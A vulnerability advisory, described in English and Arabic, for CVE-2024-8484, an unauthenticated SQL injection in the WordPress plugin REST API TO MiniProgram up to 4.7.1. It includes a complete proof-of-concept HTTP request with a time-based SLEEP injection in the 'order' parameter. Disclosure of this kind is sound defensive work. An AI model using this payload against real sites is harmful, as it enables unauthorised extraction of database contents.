
REST API TO MiniProgram <= 4.7.1 - Unauthenticated SQL Injection
REST API TO MiniProgram <= 4.7.1 - حقن SQL غير مصدق عليه
CVE: CVE-2024-8484
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVSS Score: 7.5
Slugs: rest-api-to-miniprogram
إضافة REST API TO MiniProgram لـ WordPress عرضة لحقن SQL عبر معامل 'order' لنقطة نهاية REST API /wp-json/watch-life-net/v1/comment/getcomments في جميع الإصدارات حتى 4.7.1 بسبب عدم كفاية الهروب في المعامل المقدم من المستخدم ونقص الإعداد الكافي في استعلام SQL الموجود. وهذا يجعل من الممكن للمهاجمين غير المصادق عليهم إلحاق استعلامات SQL إضافية بالاستعلامات الموجودة والتي يمكن استخدامها لاستخراج معلومات حساسة من قاعدة البيانات.
GET /wp-json/watch-life-net/v1/comment/getcomments?order=DESC,(SELECT(1)FROM(SELECT(SLEEP(10)))a)--&postid=3&limit=1&page=1&page=1 HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/post-new.php?post_type=page
Connection: keep-alive
If-Modified-Since: Mon, 16 Sep 2024 18:56:28 GMT
If-None-Match: "5a3-62241215fdfaa-gzip"
Priority: u=2
